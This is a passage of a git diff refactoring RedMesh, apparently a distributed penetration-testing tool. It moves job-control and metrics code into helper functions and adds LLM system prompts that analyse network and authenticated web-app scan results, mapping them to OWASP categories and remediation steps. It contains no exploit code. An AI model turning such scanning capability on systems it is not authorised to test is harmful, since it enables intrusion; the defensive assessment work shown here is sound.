job_status="SCHEDULED_FOR_STOP". Only valid for continuous monitoring. - "HARD": Stop immediately. Sets job_status="STOPPED". Works for any run mode. - - Returns - ------- - dict - Status including job_id and passes completed. - """ - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if not raw_job_specs: - return {"error": "Job not found", "job_id": job_id} - - _, job_specs = self._normalize_job_record(job_id, raw_job_specs) - stop_type = str(stop_type).upper() - is_continuous = job_specs.get("run_mode") == RUN_MODE_CONTINUOUS_MONITORING - - if stop_type != "HARD" and not is_continuous: - return {"error": "SOFT stop is only supported for CONTINUOUS_MONITORING jobs", "job_id": job_id} - - passes_completed = job_specs.get("job_pass", 1) - - if stop_type == "HARD": - # Stop local workers if running - local_workers = self.scan_jobs.get(job_id) - if local_workers: - for local_worker_id, job in local_workers.items(): - self.P(f"Stopping job {job_id} on local worker {local_worker_id}.") - job.stop() - self.scan_jobs.pop(job_id, None) - - # Mark worker as finished/canceled in CStore - worker_entry = job_specs.setdefault("workers", {}).setdefault(self.ee_addr, {}) - worker_entry["finished"] = True - worker_entry["canceled"] = True - - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "stopped", "Job stopped", actor_type="user") - self.P(f"Hard stop for job {job_id} after {passes_completed} passes") - else: - # SOFT stop - let current pass complete (continuous monitoring only) - job_specs["job_status"] = JOB_STATUS_SCHEDULED_FOR_STOP - self._emit_timeline_event(job_specs, "scheduled_for_stop", "Stop scheduled", actor_type="user") - self.P(f"[CONTINUOUS] Soft stop scheduled for job {job_id} (will stop after current pass)") - - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) - - return { - "job_status": job_specs["job_status"], - "stop_type": stop_type, - "job_id": job_id, - "passes_completed": passes_completed, - "pass_reports": job_specs.get("pass_reports", []), - } + """Stop a job immediately or schedule a soft stop for continuous scans.""" + return stop_monitoring(self, job_id, stop_type=stop_type) @BasePlugin.endpoint(method="post") @@ -3141,7 +2216,8 @@ def analyze_job( dict LLM analysis result or error message. """ - if not self.cfg_llm_agent_api_enabled: + llm_cfg = get_llm_agent_config(self) + if not llm_cfg["ENABLED"]: return {"error": "LLM Agent API is not enabled", "job_id": job_id} if not self.cfg_llm_agent_api_port: @@ -3172,7 +2248,7 @@ def analyze_job( job_config = self._get_job_config(job_specs) # Call LLM Agent API - analysis_type = analysis_type or self.cfg_llm_auto_analysis_type + analysis_type = analysis_type or llm_cfg["AUTO_ANALYSIS_TYPE"] # Add job metadata to report for context report_with_meta = dict(aggregated_report) @@ -3230,7 +2306,7 @@ def analyze_job( actor_type="user", meta={"report_cid": updated_cid, "pass_nr": latest_ref.get("pass_nr", current_pass)} ) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="manual_llm_update") self.P(f"Manual LLM analysis saved for job {job_id}, updated pass report CID: {updated_cid}") except Exception as e: self.P(f"Failed to update pass report with analysis: {e}", color='y') @@ -3267,84 +2343,7 @@ def get_analysis(self, job_id: str = "", cid: str = "", pass_nr: int = None): dict LLM analysis data or error message. """ - # If CID provided directly, fetch it - if cid: - try: - analysis = self.r1fs.get_json(cid) - if analysis is None: - return {"error": "Analysis not found", "cid": cid} - return {"cid": cid, "analysis": analysis} - except Exception as e: - return {"error": str(e), "cid": cid} - - # Otherwise, look up by job_id - if not job_id: - return {"error": "Either job_id or cid must be provided"} - - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return {"error": "Job not found", "job_id": job_id} - - # Look for analysis in pass_reports - pass_reports = job_specs.get("pass_reports", []) - job_status = job_specs.get("job_status", JOB_STATUS_RUNNING) - - if not pass_reports: - if job_status == JOB_STATUS_RUNNING: - return {"error": "Job still running, no passes completed yet", "job_id": job_id, "job_status": job_status} - return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} - - # Find the requested pass (or latest if not specified) - target_pass = None - if pass_nr is not None: - for entry in pass_reports: - if entry.get("pass_nr") == pass_nr: - target_pass = entry - break - if not target_pass: - return {"error": f"Pass {pass_nr} not found in history", "job_id": job_id, "available_passes": [e.get("pass_nr") for e in pass_reports]} - else: - # Get the latest pass - target_pass = pass_reports[-1] - - # Fetch the PassReport from R1FS to get inline LLM analysis - report_cid = target_pass.get("report_cid") - if not report_cid: - return { - "error": "No pass report CID available for this pass", - "job_id": job_id, - "pass_nr": target_pass.get("pass_nr"), - "job_status": job_status - } - - try: - pass_data = self.r1fs.get_json(report_cid) - if pass_data is None: - return {"error": "Pass report not found in R1FS", "cid": report_cid, "job_id": job_id} - - llm_analysis = pass_data.get("llm_analysis") - if not llm_analysis: - return { - "error": "No LLM analysis available for this pass", - "job_id": job_id, - "pass_nr": target_pass.get("pass_nr"), - "llm_failed": pass_data.get("llm_failed", False), - "job_status": job_status - } - - return { - "job_id": job_id, - "pass_nr": target_pass.get("pass_nr"), - "completed_at": pass_data.get("date_completed"), - "report_cid": report_cid, - "target": job_specs.get("target"), - "num_workers": len(job_specs.get("workers", {})), - "total_passes": len(pass_reports), - "analysis": llm_analysis, - "quick_summary": pass_data.get("quick_summary"), - } - except Exception as e: - return {"error": str(e), "cid": report_cid, "job_id": job_id} + return get_job_analysis(self, job_id=job_id, cid=cid, pass_nr=pass_nr) @BasePlugin.endpoint @@ -3360,224 +2359,6 @@ def llm_health(self): return self._get_llm_health_status() - @staticmethod - def _merge_worker_metrics(metrics_list): - """Merge scan_metrics dicts from multiple local worker threads.""" - if not metrics_list: - return None - merged = {} - # Sum connection outcomes - outcomes = {} - for m in metrics_list: - for k, v in (m.get("connection_outcomes") or {}).items(): - outcomes[k] = outcomes.get(k, 0) + v - if outcomes: - merged["connection_outcomes"] = outcomes - # Sum coverage - cov_scanned = sum(m.get("coverage", {}).get("ports_scanned", 0) for m in metrics_list if m.get("coverage")) - cov_range = sum(m.get("coverage", {}).get("ports_in_range", 0) for m in metrics_list if m.get("coverage")) - cov_skipped = sum(m.get("coverage", {}).get("ports_skipped", 0) for m in metrics_list if m.get("coverage")) - cov_open = sum(m.get("coverage", {}).get("open_ports_count", 0) for m in metrics_list if m.get("coverage")) - if cov_range: - merged["coverage"] = { - "ports_in_range": cov_range, "ports_scanned": cov_scanned, - "ports_skipped": cov_skipped, - "coverage_pct": round(cov_scanned / cov_range * 100, 1), - "open_ports_count": cov_open, - } - # Sum finding distribution - findings = {} - for m in metrics_list: - for k, v in (m.get("finding_distribution") or {}).items(): - findings[k] = findings.get(k, 0) + v - if findings: - merged["finding_distribution"] = findings - # Sum service distribution - services = {} - for m in metrics_list: - for k, v in (m.get("service_distribution") or {}).items(): - services[k] = services.get(k, 0) + v - if services: - merged["service_distribution"] = services - # Sum probe counts - for field in ("probes_attempted", "probes_completed", "probes_skipped", "probes_failed"): - merged[field] = sum(m.get(field, 0) for m in metrics_list) - # Merge probe breakdown (union of all probes) - probe_bd = {} - for m in metrics_list: - for k, v in (m.get("probe_breakdown") or {}).items(): - # Keep worst status: failed > skipped > completed - existing = probe_bd.get(k) - if existing is None or v == "failed" or (v.startswith("skipped") and existing == "completed"): - probe_bd[k] = v - if probe_bd: - merged["probe_breakdown"] = probe_bd - # Total duration: max across threads/nodes (they run in parallel) - merged["total_duration"] = max(m.get("total_duration", 0) for m in metrics_list) - # Phase durations: max per phase (threads/nodes run in parallel, so wall-clock - # time for each phase is the max across all of them) - all_phases = {} - for m in metrics_list: - for phase, dur in (m.get("phase_durations") or {}).items(): - all_phases[phase] = max(all_phases.get(phase, 0), dur) - if all_phases: - merged["phase_durations"] = all_phases - longest = max(metrics_list, key=lambda m: m.get("total_duration", 0)) - # Merge stats distributions (response_times, port_scan_delays) - # Use weighted mean, global min/max, approximate p95/p99 from max of per-thread values - for stats_field in ("response_times", "port_scan_delays"): - stats_list = [m[stats_field] for m in metrics_list if m.get(stats_field)] - if stats_list: - total_count = sum(s.get("count", 0) for s in stats_list) - if total_count > 0: - merged[stats_field] = { - "min": min(s["min"] for s in stats_list), - "max": max(s["max"] for s in stats_list), - "mean": round(sum(s["mean"] * s.get("count", 1) for s in stats_list) / total_count, 4), - "median": round(sum(s["median"] * s.get("count", 1) for s in stats_list) / total_count, 4), - "stddev": round(max(s.get("stddev", 0) for s in stats_list), 4), - "p95": round(max(s.get("p95", 0) for s in stats_list), 4), - "p99": round(max(s.get("p99", 0) for s in stats_list), 4), - "count": total_count, - } - # Success rate over time: take from the longest-running thread - if longest.get("success_rate_over_time"): - merged["success_rate_over_time"] = longest["success_rate_over_time"] - # Detection flags (any thread detecting = True) - merged["rate_limiting_detected"] = any(m.get("rate_limiting_detected") for m in metrics_list) - merged["blocking_detected"] = any(m.get("blocking_detected") for m in metrics_list) - # Open port details: union, deduplicate by port - all_details = [] - seen_ports = set() - for m in metrics_list: - for d in (m.get("open_port_details") or []): - if d["port"] not in seen_ports: - seen_ports.add(d["port"]) - all_details.append(d) - if all_details: - merged["open_port_details"] = sorted(all_details, key=lambda x: x["port"]) - # Banner confirmation: sum counts - bc_confirmed = sum(m.get("banner_confirmation", {}).get("confirmed", 0) for m in metrics_list) - bc_guessed = sum(m.get("banner_confirmation", {}).get("guessed", 0) for m in metrics_list) - if bc_confirmed + bc_guessed > 0: - merged["banner_confirmation"] = {"confirmed": bc_confirmed, "guessed": bc_guessed} - return merged - - def _publish_live_progress(self): - """ - Publish live progress for all active local scan jobs. - - Builds per-thread progress data and writes a single WorkerProgress entry - per job to the `:live` CStore hset. Called periodically from process(). - - Progress is stage-based (stage_idx / 5 * 100) with port-scan sub-progress. - Phase is the earliest (least advanced) phase across all threads. - Per-thread data (phase, ports) is included when multiple threads are active. - """ - now = self.time() - if now - self._last_progress_publish < PROGRESS_PUBLISH_INTERVAL: - return - self._last_progress_publish = now - - live_hkey = f"{self.cfg_instance_id}:live" - ee_addr = self.ee_addr - - nr_phases = len(PHASE_ORDER) - - for job_id, local_workers in self.scan_jobs.items(): - if not local_workers: - continue - - # Build per-thread data - total_scanned = 0 - total_ports = 0 - all_open = set() - all_tests = set() - thread_entries = {} - thread_phases = [] - worker_metrics = [] - - for tid, worker in local_workers.items(): - state = worker.state - nr_ports = len(worker.initial_ports) - t_scanned = len(state.get("ports_scanned", [])) - t_open = sorted(state.get("open_ports", [])) - t_phase = _thread_phase(state) - - total_scanned += t_scanned - total_ports += nr_ports - all_open.update(t_open) - all_tests.update(state.get("completed_tests", [])) - worker_metrics.append(worker.metrics.build().to_dict()) - thread_phases.append(t_phase) - - thread_entries[tid] = { - "phase": t_phase, - "ports_scanned": t_scanned, - "ports_total": nr_ports, - "open_ports_found": t_open, - } - - # Overall phase: earliest (least advanced) across threads - phase_indices = [PHASE_ORDER.index(p) if p in PHASE_ORDER else nr_phases for p in thread_phases] - min_phase_idx = min(phase_indices) if phase_indices else 0 - phase = PHASE_ORDER[min_phase_idx] if min_phase_idx < nr_phases else "done" - - # Stage-based progress: completed_stages / total * 100 - # During port_scan, add sub-progress based on ports scanned - stage_progress = (min_phase_idx / nr_phases) * 100 - if phase == "port_scan" and total_ports > 0: - stage_progress += (total_scanned / total_ports) * (100 / nr_phases) - progress_pct = round(min(stage_progress, 100), 1) - - # Look up pass number from CStore - job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - pass_nr = 1 - if isinstance(job_specs, dict): - pass_nr = job_specs.get("job_pass", 1) - - # Merge metrics from all local threads - merged_metrics = worker_metrics[0] if len(worker_metrics) == 1 else self._merge_worker_metrics(worker_metrics) - - progress = WorkerProgress( - job_id=job_id, - worker_addr=ee_addr, - pass_nr=pass_nr, - progress=progress_pct, - phase=phase, - ports_scanned=total_scanned, - ports_total=total_ports, - open_ports_found=sorted(all_open), - completed_tests=sorted(all_tests), - updated_at=now, - live_metrics=merged_metrics, - threads=thread_entries if len(thread_entries) > 1 else None, - ) - self.chainstore_hset( - hkey=live_hkey, - key=f"{job_id}:{ee_addr}", - value=progress.to_dict(), - ) - - def _clear_live_progress(self, job_id, worker_addresses): - """ - Remove live progress keys for a completed job. - - Parameters - ---------- - job_id : str - Job identifier. - worker_addresses : list[str] - Worker addresses whose progress keys should be removed. - """ - live_hkey = f"{self.cfg_instance_id}:live" - for addr in worker_addresses: - self.chainstore_hset( - hkey=live_hkey, - key=f"{job_id}:{addr}", - value=None, # delete - ) - def process(self): """ Periodic task handler: launch new jobs and close completed ones. @@ -3592,7 +2373,7 @@ def process(self): if self._semaphore_get_keys() and not self.is_plugin_ready(): self.semaphore_start_wait() if self.semaphore_check_with_logging(): - if self.cfg_llm_agent_api_enabled: + if get_llm_agent_config(self)["ENABLED"]: self._maybe_resolve_llm_agent_from_semaphore() self.set_plugin_ready(True) @@ -3606,6 +2387,8 @@ def process(self): self._maybe_launch_jobs() # Publish live progress for active scans self._publish_live_progress() + # Launcher-side retry path for missed worker announcements + self._maybe_reannounce_worker_assignments() # Stop local workers for jobs that were stopped via API (multi-node propagation) self._maybe_stop_canceled_jobs() # Check active jobs for completion diff --git a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py index 92ff3d3f..02d4af1f 100644 --- a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py +++ b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py @@ -92,44 +92,141 @@ }, } -# System prompts for scan analysis -ANALYSIS_PROMPTS = { - LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a cybersecurity expert analyzing network scan results. -Provide a comprehensive security assessment of the target based on the scan data. -Include: -1. Executive summary of security posture -2. Key findings organized by severity (Critical, High, Medium, Low) -3. Attack surface analysis -4. Overall risk rating - -Be specific and reference the actual findings from the scan data.""", - - LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a cybersecurity expert analyzing network scan results. -Provide a prioritized vulnerability summary based on the scan data. -Include: -1. Vulnerabilities ranked by severity and exploitability -2. CVE references where applicable -3. Potential impact of each vulnerability -4. Quick wins (easy fixes with high impact) - -Focus on actionable findings.""", - - LLM_ANALYSIS_REMEDIATION_PLAN: """You are a cybersecurity expert analyzing network scan results. -Provide a detailed remediation plan based on the scan data. -Include: -1. Prioritized remediation steps -2. Specific commands or configurations to fix issues -3. Estimated effort for each fix -4. Dependencies between fixes -5. Verification steps to confirm remediation - -Be practical and provide copy-paste ready solutions where possible.""", - - LLM_ANALYSIS_QUICK_SUMMARY: """You are a cybersecurity expert. Based on the scan results below, write a quick executive summary in exactly 2-4 sentences. Cover: how many ports/services were found, the overall risk posture (critical/high/medium/low), and the single most important finding or action item. Be specific but extremely concise -- this is a dashboard glance summary, not a full report.""", +# System prompts for scan analysis — network (blackbox port scanning) +_NETWORK_PROMPTS = { + LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a senior penetration tester analyzing blackbox network scan results. The scan probed TCP ports on the target, fingerprinted services, tested for known CVEs, checked default credentials, and ran protocol-specific probes (HTTP, SSH, TLS, DNS, SMTP, databases, ICS/SCADA). + +Provide a comprehensive security assessment. Structure your response as: + +1. **Executive Summary** — One paragraph: overall security posture, number of open ports, number and severity distribution of findings, and whether the target is internet-facing or internal. +2. **Critical & High Findings** — For each finding: what was found, why it matters (business impact, not just technical), exploitability (is a public exploit available? is it authenticated or unauthenticated?), and the specific evidence from scan data (port, service, banner, CVE ID). +3. **Attack Surface Analysis** — Map the exposed services to potential attack chains. Identify lateral movement opportunities (e.g., exposed database + weak credentials → data exfiltration). Note any ICS/SCADA indicators. +4. **Medium & Low Findings** — Briefly list with one-line impact statements. +5. **Risk Rating** — Rate as Critical/High/Medium/Low with a one-sentence justification. Factor in: number of critical findings, presence of default credentials, unpatched CVEs with public exploits, and exposed management interfaces. + +Reference specific ports, services, CVE IDs, and banners from the scan data. Do not make generic recommendations — be specific to what was actually found.""", + + LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a senior penetration tester analyzing blackbox network scan results. The scan probed TCP ports, fingerprinted services, and tested for known CVEs and misconfigurations. + +Provide a prioritized vulnerability summary. Structure your response as: + +1. **Findings by Severity** — Group findings into Critical, High, Medium, Low. For each: + - One-line title (e.g., "OpenSSH 7.4 — CVE-2023-38408 (RCE)") + - Port/service where found + - CVSS score or exploitability assessment (unauthenticated RCE > authenticated info disclosure) + - Real-world impact (data breach, lateral movement, denial of service) +2. **Quick Wins** — Top 3-5 fixes with highest security impact and lowest effort (e.g., disable SSLv3, change default password, restrict management port to VPN). +3. **CVE Cross-Reference** — Table of all CVEs found with affected service, version, and whether a public exploit exists. + +Rank findings by exploitability first, then severity. An unauthenticated RCE on a public-facing service is always the top priority, regardless of CVSS score.""", + + LLM_ANALYSIS_REMEDIATION_PLAN: """You are a senior penetration tester creating a remediation plan from blackbox network scan results. The scan probed TCP ports, fingerprinted services, and tested for CVEs and misconfigurations. + +Provide a remediation plan that a system administrator can execute. Structure your response as: + +1. **Immediate Actions (24-48 hours)** — Critical and easily exploitable findings. For each: + - What to fix and where (specific port, service, config file) + - Exact command or configuration change (copy-paste ready) + - Verification step to confirm the fix worked +2. **Short-Term (1-2 weeks)** — High findings, patch deployments, credential rotations. +3. **Medium-Term (1-3 months)** — Architecture improvements, network segmentation, hardening. +4. **Dependencies** — Note where one fix must happen before another (e.g., "patch OpenSSH before rotating SSH keys"). +5. **Compensating Controls** — If a fix requires downtime or coordination, suggest interim mitigations (e.g., firewall rule to restrict access while waiting for patch window). + +Be specific to the services and versions found. Do not suggest generic hardening guides — reference the actual findings.""", + + LLM_ANALYSIS_QUICK_SUMMARY: """You are a senior penetration tester. Based on the network scan results below, write an executive summary in exactly 2-4 sentences. + +Cover: number of open ports, number of services identified, overall risk posture (Critical/High/Medium/Low), and the single most important finding or action item. Mention specific CVEs or service names if critical findings exist. This is a dashboard glance summary — be specific but extremely concise.""", +} + + +# System prompts for scan analysis — webapp (authenticated graybox testing) +_WEBAPP_PROMPTS = { + LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a senior web application security specialist analyzing authenticated graybox scan results. The scan authenticated to the target web application with admin and optionally regular-user credentials, discovered routes and forms via crawling, and ran OWASP Top 10 probes including: + +- **A01 (Broken Access Control)**: IDOR/BOLA testing, privilege escalation from regular to admin endpoints +- **A02 (Security Misconfiguration)**: Debug endpoint exposure, CORS policy, security headers, cookie attributes, CSRF protection, session token quality (JWT alg=none, short tokens) +- **A03 (Injection)**: Reflected XSS and SQL injection in login and authenticated forms, stored XSS via form submission and readback +- **A05 (Broken Access Control)**: Login form injection testing +- **A06 (Insecure Design)**: Workflow bypass testing on state-changing endpoints +- **A07 (Identification & Auth Failures)**: Bounded weak credential testing with lockout detection +- **API7 (SSRF)**: Server-side request forgery on URL-fetch endpoints + +Each finding has a status (vulnerable / not_vulnerable / inconclusive), severity, OWASP category, CWE IDs, evidence, and replay steps. + +Provide a comprehensive security assessment. Structure your response as: + +1. **Executive Summary** — One paragraph: overall application security posture, how many scenarios were tested, how many are vulnerable, and the OWASP categories with the most findings. Note the authentication context (which user roles were tested). +2. **Critical & High Findings** — For each vulnerable finding: + - Scenario ID and title + - Business impact (e.g., "Unauthorized access to other users' records", "Session hijacking via XSS", "Admin functionality accessible to regular users") + - Exploitability: Is it trivially reproducible? Does it require authentication? Can it be chained with other findings? + - Evidence from the scan (endpoint, payload, response) + - Replay steps (from the scan data) so the development team can reproduce +3. **OWASP Coverage Analysis** — Which OWASP categories were tested and what the outcomes were. Flag any categories that were skipped (probes disabled, missing configuration, no forms discovered) — these represent blind spots. +4. **Attack Chain Analysis** — Identify how individual findings could be chained (e.g., XSS + missing CSRF → account takeover, IDOR + weak auth → mass data exfiltration). +5. **Medium & Low Findings** — Missing security headers, cookie attribute issues, inconclusive results that warrant manual verification. +6. **Risk Rating** — Rate as Critical/High/Medium/Low. A single IDOR or privilege escalation finding on a production app with real user data makes this Critical regardless of other findings. + +Reference specific scenario IDs, endpoints, and evidence from the scan data. For inconclusive findings, explain what manual testing would confirm or rule out the issue.""", + + LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a senior web application security specialist analyzing authenticated graybox scan results. The scan tested OWASP Top 10 categories (A01-A07, API7) against the target application using admin and regular-user sessions. + +Each finding has: scenario_id, status (vulnerable/not_vulnerable/inconclusive), severity, OWASP category, CWE IDs, evidence, and replay steps. + +Provide a prioritized vulnerability summary. Structure your response as: + +1. **Vulnerable Findings by Severity** — Group by Critical, High, Medium, Low. For each: + - Scenario ID and title + - OWASP category and CWE + - One-line business impact + - Whether the finding is confirmed (status=vulnerable) or needs manual verification (status=inconclusive) +2. **Quick Wins** — Top 3-5 fixes with highest security impact and lowest development effort. Examples: add CSRF tokens, set HttpOnly/Secure on cookies, add Content-Security-Policy header, fix CORS wildcard. +3. **Inconclusive Findings Requiring Manual Review** — List findings with status=inconclusive and explain what additional testing would confirm them (e.g., "JWT signature weakness detected — manually verify if the signing key is brute-forceable"). +4. **Untested Areas** — Probes that were skipped (stateful probes disabled, no SSRF endpoints configured, no forms discovered). These are coverage gaps the team should address manually. + +Rank confirmed vulnerabilities above inconclusive ones. Rank by business impact: access control failures > injection > misconfigurations.""", + + LLM_ANALYSIS_REMEDIATION_PLAN: """You are a senior web application security specialist creating a remediation plan from authenticated graybox scan results. The scan tested OWASP Top 10 categories against the target application. + +Each finding includes: scenario_id, OWASP category, CWE IDs, evidence, and replay steps for reproduction. + +Provide a remediation plan for the development team. Structure your response as: + +1. **Immediate Actions (next sprint)** — Critical and High findings. For each: + - What to fix, referencing the specific endpoint and CWE + - Code-level fix guidance (e.g., "Add @login_required + object ownership check on /api/records/{id}/", "Escape output with django.utils.html.escape()", "Set SameSite=Strict on session cookie") + - Framework-specific guidance where possible (Django, Flask, Rails, Express patterns) + - Verification: how to confirm the fix using the replay steps from the scan +2. **Short-Term (1-2 sprints)** — Medium findings, security header additions, cookie hardening. +3. **Architecture Improvements** — Systemic fixes that prevent entire vulnerability classes: + - CSRF: framework-level middleware enforcement (not per-endpoint) + - Access control: centralized authorization middleware (not per-view checks) + - Injection: parameterized queries + output encoding at the template layer + - Security headers: middleware/reverse-proxy level (one config change covers all endpoints) +4. **Testing Improvements** — Suggest integration tests the team should add to prevent regressions (e.g., "Add test that regular user gets 403 on /api/admin/export-users/"). + +Reference the specific scenario IDs and endpoints from the scan. Provide copy-paste code snippets where possible.""", + + LLM_ANALYSIS_QUICK_SUMMARY: """You are a senior web application security specialist. Based on the authenticated graybox scan results below, write an executive summary in exactly 2-4 sentences. + +Cover: how many OWASP scenarios were tested, how many are vulnerable, the highest-severity finding (mention the specific vulnerability type — e.g., IDOR, XSS, CSRF bypass), and the single most important action item for the development team. This is a dashboard glance summary — be specific but extremely concise.""", } -class RedmeshLlmAgentApiPlugin(BasePlugin): +def _get_analysis_prompts(scan_type: str) -> dict: + """Select prompt set based on scan type.""" + if scan_type == "webapp": + return _WEBAPP_PROMPTS + return _NETWORK_PROMPTS + + +# Default prompts (network) for backward compatibility +ANALYSIS_PROMPTS = _NETWORK_PROMPTS + + +class RedMeshLlmAgentApiPlugin(BasePlugin): """ RedMesh LLM Agent API plugin for DeepSeek integration. @@ -152,7 +249,7 @@ class RedmeshLlmAgentApiPlugin(BasePlugin): def on_init(self): """Initialize plugin and validate DeepSeek API key.""" - super(RedmeshLlmAgentApiPlugin, self).on_init() + super(RedMeshLlmAgentApiPlugin, self).on_init() self._api_key = self._load_api_key() self._request_count = 0 self._error_count = 0 @@ -221,7 +318,7 @@ def _load_api_key(self) -> Optional[str]: def P(self, s, *args, **kwargs): """Prefixed logger for RedMesh LLM messages.""" s = "[REDMESH_LLM] " + str(s) - return super(RedmeshLlmAgentApiPlugin, self).P(s, *args, **kwargs) + return super(RedMeshLlmAgentApiPlugin, self).P(s, *args, **kwargs) def Pd(self, s, *args, score=-1, **kwargs): """Debug logging with verbosity control.""" @@ -480,6 +577,7 @@ def analyze_scan( self, scan_results: Dict[str, Any], analysis_type: str = LLM_ANALYSIS_SECURITY_ASSESSMENT, + scan_type: str = "network", focus_areas: Optional[List[str]] = None, model: Optional[str] = None, temperature: Optional[float] = None, @@ -498,6 +596,9 @@ def analyze_scan( - "security_assessment" (default): Overall security posture evaluation - "vulnerability_summary": Prioritized list of findings with severity - "remediation_plan": Actionable steps to fix identified issues + scan_type : str, optional + Scan type: "network" (blackbox port scan) or "webapp" (authenticated graybox). + Selects the appropriate prompt set for the analysis. focus_areas : list of str, optional Specific areas to focus on: ["web", "network", "databases", "authentication"] model : str, optional @@ -532,8 +633,9 @@ def analyze_scan( "status": LLM_API_STATUS_ERROR, } - # Get system prompt for analysis type - system_prompt = ANALYSIS_PROMPTS.get(analysis_type, ANALYSIS_PROMPTS[LLM_ANALYSIS_SECURITY_ASSESSMENT]) + # Get system prompt for analysis type (scan-type-aware) + prompts = _get_analysis_prompts(scan_type or "network") + system_prompt = prompts.get(analysis_type, prompts[LLM_ANALYSIS_SECURITY_ASSESSMENT]) # Add focus areas if provided if focus_areas: @@ -585,9 +687,27 @@ def analyze_scan( # Get token usage for cost tracking usage = response.get("usage", {}) + # Build scan summary (scan-type-aware) + scan_summary = { + "scan_type": scan_type or "network", + } + if scan_type == "webapp": + graybox = scan_results.get("graybox_results", {}) + scenarios = graybox.get("scenarios", []) + scan_summary["total_scenarios"] = len(scenarios) + scan_summary["vulnerable"] = sum(1 for s in scenarios if s.get("status") == "vulnerable") + scan_summary["not_vulnerable"] = sum(1 for s in scenarios if s.get("status") == "not_vulnerable") + scan_summary["inconclusive"] = sum(1 for s in scenarios if s.get("status") == "inconclusive") + scan_summary["has_graybox_results"] = bool(scenarios) + else: + scan_summary["open_ports"] = len(scan_results.get("open_ports", [])) + scan_summary["has_service_info"] = "service_info" in scan_results + scan_summary["has_web_tests"] = "web_tests_info" in scan_results + # Return clean, minimal structure return { "analysis_type": analysis_type, + "scan_type": scan_type or "network", "focus_areas": focus_areas, "model": response.get("model"), "content": content, @@ -596,11 +716,7 @@ def analyze_scan( "completion_tokens": usage.get("completion_tokens"), "total_tokens": usage.get("total_tokens"), }, - "scan_summary": { - "open_ports": len(scan_results.get("open_ports", [])), - "has_service_info": "service_info" in scan_results, - "has_web_tests": "web_tests_info" in scan_results, - }, + "scan_summary": scan_summary, "created_at": self.time(), } @@ -610,5 +726,5 @@ def analyze_scan( def process(self): """Main plugin loop (minimal for this API-only plugin).""" - super(RedmeshLlmAgentApiPlugin, self).process() + super(RedMeshLlmAgentApiPlugin, self).process() return diff --git a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py deleted file mode 100644 index 770b8cc0..00000000 --- a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py +++ /dev/null @@ -1,402 +0,0 @@ -""" -LLM Agent API Mixin for RedMesh Pentester. - -This mixin provides LLM integration methods for analyzing scan results -via the RedMesh LLM Agent API (DeepSeek). - -Usage: - class PentesterApi01Plugin(_LlmAgentMixin, BasePlugin): - ... -""" - -import requests -from typing import Optional - -from .constants import RUN_MODE_SINGLEPASS - - -class _RedMeshLlmAgentMixin(object): - """ - Mixin providing LLM Agent API integration for RedMesh plugins. - - This mixin expects the host class to have the following config attributes: - - cfg_llm_agent_api_enabled: bool - - cfg_llm_agent_api_host: str - - cfg_llm_agent_api_port: int - - cfg_llm_agent_api_timeout: int - - cfg_llm_auto_analysis_type: str - - And the following methods/attributes: - - self.r1fs: R1FS instance - - self.P(): logging method - - self.Pd(): debug logging method - - self._get_aggregated_report(): report aggregation method - """ - - def __init__(self, **kwargs): - super(_RedMeshLlmAgentMixin, self).__init__(**kwargs) - return - - def _maybe_resolve_llm_agent_from_semaphore(self): - """ - If SEMAPHORED_KEYS is configured and LLM Agent is enabled, - read API_IP and API_PORT from semaphore env published by - the LLM Agent API plugin. Overrides static config values. - """ - if not self.cfg_llm_agent_api_enabled: - return False - semaphored_keys = getattr(self, 'cfg_semaphored_keys', None) - if not semaphored_keys: - return False - if not self.semaphore_is_ready(): - return False - env = self.semaphore_get_env() - if not env: - return False - api_host = env.get('API_IP') or env.get('API_HOST') or env.get('HOST') - api_port = env.get('PORT') or env.get('API_PORT') - if api_host and api_port: - self.P("Resolved LLM Agent API from semaphore: {}:{}".format(api_host, api_port)) - self.config_data['LLM_AGENT_API_HOST'] = api_host - self.config_data['LLM_AGENT_API_PORT'] = int(api_port) - return True - return False - - def _get_llm_agent_api_url(self, endpoint: str) -> str: - """ - Build URL for LLM Agent API endpoint. - - Parameters - ---------- - endpoint : str - API endpoint path (e.g., "/chat", "/analyze_scan"). - - Returns - ------- - str - Full URL to the endpoint. - """ - host = self.cfg_llm_agent_api_host - port = self.cfg_llm_agent_api_port - endpoint = endpoint.lstrip("/") - return f"http://{host}:{port}/{endpoint}" - - def _call_llm_agent_api( - self, - endpoint: str, - method: str = "POST", - payload: dict = None, - timeout: int = None - ) -> dict: - """ - Make HTTP request to the LLM Agent API. - - Parameters - ---------- - endpoint : str - API endpoint to call (e.g., "/analyze_scan", "/health"). - method : str, optional - HTTP method (default: "POST"). - payload : dict, optional - JSON payload for POST requests. - timeout : int, optional - Request timeout in seconds. - - Returns - ------- - dict - API response or error object. - """ - if not self.cfg_llm_agent_api_enabled: - return {"error": "LLM Agent API is not enabled", "status": "disabled"} - - if not self.cfg_llm_agent_api_port: - return {"error": "LLM Agent API port not configured", "status": "config_error"} - - url = self._get_llm_agent_api_url(endpoint) - timeout = timeout or self.cfg_llm_agent_api_timeout - - try: - self.Pd(f"Calling LLM Agent API: {method} {url}") - - if method.upper() == "GET": - response = requests.get(url, timeout=timeout) - else: - response = requests.post( - url, - json=payload or {}, - headers={"Content-Type": "application/json"}, - timeout=timeout - ) - - if response.status_code != 200: - return { - "error": 